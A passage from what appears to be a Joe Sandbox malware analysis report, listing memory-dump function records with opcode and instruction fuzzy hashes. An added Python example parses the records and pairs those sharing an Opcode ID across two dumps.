                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 29d48deba50488b5831cc48becd701077cdc31f4289528a70b5869d65e44ecfb
                                                                                                                                                                                                                                                  • Instruction ID: 7dcc80d816ecc746bafad720e8a6480fdb3dacd1e1def68f4d5addeb7cdbe83a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29d48deba50488b5831cc48becd701077cdc31f4289528a70b5869d65e44ecfb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E513AB29486815FD724CF2CC89177AB7F6AFD5214F084A2DE0DAC7292D735D905CB42
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e5e5745a9e04c2a491c48c9e8dc2ff63359ea52b338f82eca13cde478cb73e3a
                                                                                                                                                                                                                                                  • Instruction ID: cf47c0a0b3399ffa2da03a95775f064ec3ec9b1ebd9ff91f42672857af2753b5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5e5745a9e04c2a491c48c9e8dc2ff63359ea52b338f82eca13cde478cb73e3a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24416233B505114BC31C8F28C8A63BAFBA2FF8921471E512DC955A7745D778981287C0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e5e5745a9e04c2a491c48c9e8dc2ff63359ea52b338f82eca13cde478cb73e3a
                                                                                                                                                                                                                                                  • Instruction ID: 0879eb64182fa33bd680848163e7b412a319af03fbceb7a9ba4b6aa96abc02f2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5e5745a9e04c2a491c48c9e8dc2ff63359ea52b338f82eca13cde478cb73e3a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51416033B106518BC71C8E68C9923AAFBA3FB8A310B1E523EC955AB785D77C9C1147C4
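The records above repeat the same Opcode ID at two different dumps: for example 76e94ee5… and e5e5745a… each appear once in the non-PE-backed region at 02160000 (the dump carrying the Yara matches) and once in the process image at 00400000, with identical Opcode Fuzzy Hash but different Instruction Fuzzy Hash. That pairing is what you would expect if the opcode hash discards operand bytes while the instruction hash keeps them (an inference from the field names; the report does not document the hashing). Pulling such pairs out of a long listing by hand is error-prone, so below is a small parser that does it. This is an added example, not Joe Sandbox code; the report exposes no parsing API. The record layout and field names are taken from the listing itself, the three sample records are copied from this report with whitespace trimmed, and the dictionary keys `offset`, `based_on_pe`, `yara` and `source_file` are my own naming.

```python
"""Correlate Joe Sandbox 'Memory Dump Source' function records across dumps by Opcode ID.

Added example, not Joe Sandbox code. Field names follow the report listing; the
dictionary keys used below ('offset', 'based_on_pe', 'yara', 'source_file') are
this example's own naming, not something the report defines.
"""
import re
from collections import defaultdict

# Constructed input: three records copied from this report (whitespace trimmed).
SAMPLE = """\
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 76e94ee5ef1ec981491ae59ea2b09b41901541db9a92759e325bf4aa5bc5ab3c
• Instruction ID: 9af512250648790106b9ce23e98dd583921c2a0a063ff9dde1a5207ca49fb40c
• Opcode Fuzzy Hash: 76e94ee5ef1ec981491ae59ea2b09b41901541db9a92759e325bf4aa5bc5ab3c
• Instruction Fuzzy Hash: B45192B19047419FD3209F28DC5872AB7A5AB85338F14473DECA9972E0E731D925CB86
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 76e94ee5ef1ec981491ae59ea2b09b41901541db9a92759e325bf4aa5bc5ab3c
• Instruction ID: 08a7e479931a5a61fa7b69175e4513341166876bb814eb369fc510c4807828e1
• Opcode Fuzzy Hash: 76e94ee5ef1ec981491ae59ea2b09b41901541db9a92759e325bf4aa5bc5ab3c
• Instruction Fuzzy Hash: 6651C1B19047019BD3109F389D4871BB7A4BB85338F14473DE8A9A73E1E378E915CB8A
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 29d48deba50488b5831cc48becd701077cdc31f4289528a70b5869d65e44ecfb
• Instruction ID: 7dcc80d816ecc746bafad720e8a6480fdb3dacd1e1def68f4d5addeb7cdbe83a
• Opcode Fuzzy Hash: 29d48deba50488b5831cc48becd701077cdc31f4289528a70b5869d65e44ecfb
• Instruction Fuzzy Hash: 8E513AB29486815FD724CF2CC89177AB7F6AFD5214F084A2DE0DAC7292D735D905CB42
"""

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")          # "• Key: value" bullet lines
SOURCE_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")


def parse_records(text):
    """Split the flat listing into one dict per 'Memory Dump Source' record."""
    records, rec = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":          # header opens a new record
            rec = {"yara": False}
            records.append(rec)
        elif rec is None:                         # text before the first record
            continue
        elif line == "Yara matches":              # bare label, no bullet
            rec["yara"] = True
        elif (m := FIELD_RE.match(line)):
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "Source File":
                s = SOURCE_RE.search(value)
                rec["offset"] = int(s.group(1), 16)
                rec["based_on_pe"] = s.group(2) == "true"
                rec["source_file"] = value.split(",", 1)[0]
            elif value:                           # skip empty 'API ID:'-style fields
                rec[key] = value
    return records


def shared_opcode_ids(records):
    """Opcode IDs seen in more than one dump, mapped to the dump offsets they occur at."""
    by_opcode = defaultdict(set)
    for r in records:
        by_opcode[r["Opcode ID"]].add(r["offset"])
    return {oid: offs for oid, offs in by_opcode.items() if len(offs) > 1}


def instruction_hashes_for(records, opcode_id):
    """Per-dump Instruction Fuzzy Hash for one Opcode ID, to compare operand-level differences."""
    return {r["offset"]: r["Instruction Fuzzy Hash"]
            for r in records if r["Opcode ID"] == opcode_id}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for oid, offs in shared_opcode_ids(recs).items():
        print(oid[:16], "seen at", ", ".join(f"{o:08X}" for o in sorted(offs)))
        for off, h in instruction_hashes_for(recs, oid).items():
            print(f"  {off:08X}: {h}")
```

Run against the full report export rather than the three sample records, `shared_opcode_ids` gives the set of functions that exist both in the unpacked region and in the process image, which is the natural starting point for diffing the two dumps in IDA; `instruction_hashes_for` then tells you, per function, whether the bytes differ at operand level only.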
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e063f326ffa53de25d0b9ba43cf0ed4dbc710327434a92a2670b2cdd79f8318c
                                                                                                                                                                                                                                                  • Instruction ID: 3db4177735a4f3cf8520350d3eb1710257421b0212f1c31a09b5c2e4a79d0b41
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e063f326ffa53de25d0b9ba43cf0ed4dbc710327434a92a2670b2cdd79f8318c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F31F5312447818FCB288F39C4517ABBBF1DB9A318F18556DC1D387782C37AA946CB54
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e063f326ffa53de25d0b9ba43cf0ed4dbc710327434a92a2670b2cdd79f8318c
                                                                                                                                                                                                                                                  • Instruction ID: f81eb2cd5989d868f824b990d4dd2db3b11f7867acd7d29f2a686ef0f787acd2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e063f326ffa53de25d0b9ba43cf0ed4dbc710327434a92a2670b2cdd79f8318c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE3101312047908BCB288F29C4913ABBBF1DB5A314F18596DC1D787782C33DA8868B58
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: a2ce6c0da914478739eba616fd4154f3e88796775ada538367235ffdeb7569ea
                                                                                                                                                                                                                                                  • Instruction ID: 0f25d0e2dd4fc9ae72aa4e5a7cf023e81b55b046d92c04a2eabf0bd42634f393
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2ce6c0da914478739eba616fd4154f3e88796775ada538367235ffdeb7569ea
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB213A704486C29FD7258B34C850BFABBB4EF93309F24149DC5D2C7142EB26A119C760
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: dd2de309bfda2136c0d462cb6aa5ae00d2b6fecf143226232f91c3f973c32b9d
                                                                                                                                                                                                                                                  • Instruction ID: 6e138cb6fd9e5e0f0caf11801ec2ce96e74ed1cdd16602e21eaa68cbd0470f93
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd2de309bfda2136c0d462cb6aa5ae00d2b6fecf143226232f91c3f973c32b9d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F52128705086C28FD7258B34C8507F3BBA1EF63308F18149ED1C387243E769A55AC769
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7049adb2f7025235c58f023c4660da274fa3317cab2b6e39ac701c24428ad074
                                                                                                                                                                                                                                                  • Instruction ID: 939499241f6003077a9c1aacf716074a501e53bbf4f8afaf6cd0bc726af79fa8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7049adb2f7025235c58f023c4660da274fa3317cab2b6e39ac701c24428ad074
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA21B871645B408FE722CF22C8917A7BBF2EB85314F05996DC1C297A59CBB8A00A8B44
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                  • Instruction ID: 0052d157e419b32dd0ab1c5053b5b7bffd3615d58ae57c9c8687581377a2d585
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB11E533A451D00EC71A8D3C88005A5BFA30A93674F1A83A9F4B99B2D2C7238D8B8360
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                  • Instruction ID: 11cf033bb50aef6adb2bbe7b02e6cb6781f41557c363ff6b9b8f28e1f234bab9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B11A933A052D40EC3168D3C8840565FFE30AD7635F69939EF4B49B2D2DA2ACD8A8359
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 704165ecad2831eee6818578ecb7b66d087a772bcbae644b5281e1cc38099ed0
                                                                                                                                                                                                                                                  • Instruction ID: f9a47f1f5c535235547f06cf274996cdf7808c40566fded50ef78f0c78f4e65e
• Opcode Fuzzy Hash: 704165ecad2831eee6818578ecb7b66d087a772bcbae644b5281e1cc38099ed0
• Instruction Fuzzy Hash: 0A01B5F26447016BE720BE1085C4B3BB6AA6F8171CF18462CC9058B300EBB3E9198E91
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c486ac2ce1ad100f0e38d66cbdf0be4d35fa78da5d65ee2e406166fba6341134
• Instruction ID: 60ee57cc75265846ada0afa1f54ef24058dfca82aab4f0d1b8d5b1c2d5a04392
• Opcode Fuzzy Hash: c486ac2ce1ad100f0e38d66cbdf0be4d35fa78da5d65ee2e406166fba6341134
• Instruction Fuzzy Hash: 46019EB1B00B1157DB209E11A8D0B27B7A8AF85708F58443EE8445B746DB79FC05C2D9
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5902da4a83a0c680140072e5af1454c543d54360fc1713abbe1431a6a1abbba6
• Instruction ID: 635585c2d5b43dbe43cc0899f470a99481d67250a255306895b959ebaa5f4a80
• Opcode Fuzzy Hash: 5902da4a83a0c680140072e5af1454c543d54360fc1713abbe1431a6a1abbba6
• Instruction Fuzzy Hash: 2411D331104B508FD7248F25C824377BBF1ABA6318F198A6DC1E787AD1DB7AE10A8B40
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5902da4a83a0c680140072e5af1454c543d54360fc1713abbe1431a6a1abbba6
• Instruction ID: c9cc8284e85fe6abf120993d5689944f48ac7ce1a7ddbbf0d82d0496898c4a81
• Opcode Fuzzy Hash: 5902da4a83a0c680140072e5af1454c543d54360fc1713abbe1431a6a1abbba6
• Instruction Fuzzy Hash: 6911D331104B508FD7248F25C8243A7BBE1AB56318F198A5DC1E7877D1DB7AE1098B44
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
• Instruction ID: e81c9184a14a1acc41dadb2e465f26a558e1f729c558e0442cdebb48b610f856
• Opcode Fuzzy Hash: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
• Instruction Fuzzy Hash: B50171201082C28FD7128F28D410BA6FBF0AF93318F1896C6C4D58B683D3659A45C765
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
• Instruction ID: f399462e58419c9d3019aec57572db2d86c2935946d127ab36988b8cbde57321
• Opcode Fuzzy Hash: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
• Instruction Fuzzy Hash: 6A0171745082828FD7128F2994206A6FBE0EF63314F1896C7D4D58BA83C368A985C7A9
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
• Instruction ID: 652b74a9106745197a04eb28ca8e718275609eeb112f5a076daa9bc08751d310
• Opcode Fuzzy Hash: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
• Instruction Fuzzy Hash: CC018F201082C28FEB124B28C410BA6FFF0AF93318F1896C6C0D58F683D3699A45C765
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fad5250513806df5dd8045c20fe98b1af86ce319376dba478ac7ddfced606c7b
• Instruction ID: cfbfb0579379482bcc422702d7f80d752ec9bc7b3e9f115da6b33ea90b54b957
• Opcode Fuzzy Hash: fad5250513806df5dd8045c20fe98b1af86ce319376dba478ac7ddfced606c7b
• Instruction Fuzzy Hash: D101F2605042C28FEB118F28D010BA6FBF0AF93328F1896DAC4D58B282D376C549CB61
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
• Instruction ID: 925483313e90eaab4478f3efb897dfea373d722ea9097d537696ebe3f586dc89
• Opcode Fuzzy Hash: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
• Instruction Fuzzy Hash: B90184305082C28ED7128F2984207A6FFA0EF63314F1895C7D4D58F6C3C3689985C7A9
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c35b802276cb4cab2e01238cfef8ad4f73f74ed2e8d92cb0ff5c3d327f1c90cc
• Instruction ID: ce15afb6e8349f4df79a6844a38630f2605c57d7838470a331403b3b5471d388
• Opcode Fuzzy Hash: c35b802276cb4cab2e01238cfef8ad4f73f74ed2e8d92cb0ff5c3d327f1c90cc
• Instruction Fuzzy Hash: 6D01F2745082828EEB128F29D0107A7FBE0EF63314F18969AC4D58F6C3C379D885C7A9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: cd38a00dc9aa6d99ca01aac821546609123fc2e2b8e046733f98ea8146a72aec
                                                                                                                                                                                                                                                  • Instruction ID: c0b4a7645aed046faff80445a1a00849260a9e0a604dc3165cb580035c2becad
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd38a00dc9aa6d99ca01aac821546609123fc2e2b8e046733f98ea8146a72aec
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5110C7025C3808FD7148F54D9D576BBBE1ABD2304F244A2CD5C127292D7F5890987A7
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
                                                                                                                                                                                                                                                  • Instruction ID: 90e5ec283c13e40ca86116f3df06184d0fd8b45ee6d0545186c0b059323bae99
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41016D205082C28FEB124B29D410BB6FFF0AF93318F1896D6D5D58F6C3D36A8A49C765
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
                                                                                                                                                                                                                                                  • Instruction ID: 743bb6218d146487c45d38f060deef663a31a3ebd16d578a5b80eb567479d545
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA01A2205082C28EE7128F2984207B6FFA0EF63314F1896C7D4D58F6C3C3699985C7A9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
                                                                                                                                                                                                                                                  • Instruction ID: 20ee9b798796cc1b2261af89ff16ba61041f4ab971ed9f9460d7b0566c6994e3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
